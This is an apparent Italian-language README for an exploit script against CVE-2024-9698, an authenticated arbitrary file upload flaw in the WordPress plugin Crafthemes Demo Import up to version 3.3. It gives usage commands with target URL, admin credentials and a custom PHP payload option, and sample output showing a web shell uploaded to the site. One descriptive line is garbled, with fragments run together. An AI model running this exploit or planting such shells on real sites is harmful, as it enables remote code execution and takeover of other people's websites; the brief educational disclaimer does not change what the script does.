
Crafthemes Demo Import <= 3.3 - Autenticato (Admin+) Caricamento Arbitrario di File in process_uploaded_files
Questo exploit prende di mira una vulnerabilità critica (CVE-2024-9698) nel plugin Crafthemes Demo Import per WordPress. La vulnerabilità consente agli amministratori autenticati di caricare file arbitrari sul sito WordPress interessato, portando a una potenziale esecuzione remota di codice (RCE).
process_uploaded_filesreadme.txt.admin-ajax.php per caricare una shell PHP personalizzata.python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
Se desideri caricare un payload PHP personalizzato, usa:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
Disclaimer: Questo script è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. L'uso non autorizzato contro sistemi senza esplicita autorizzazione è illegale.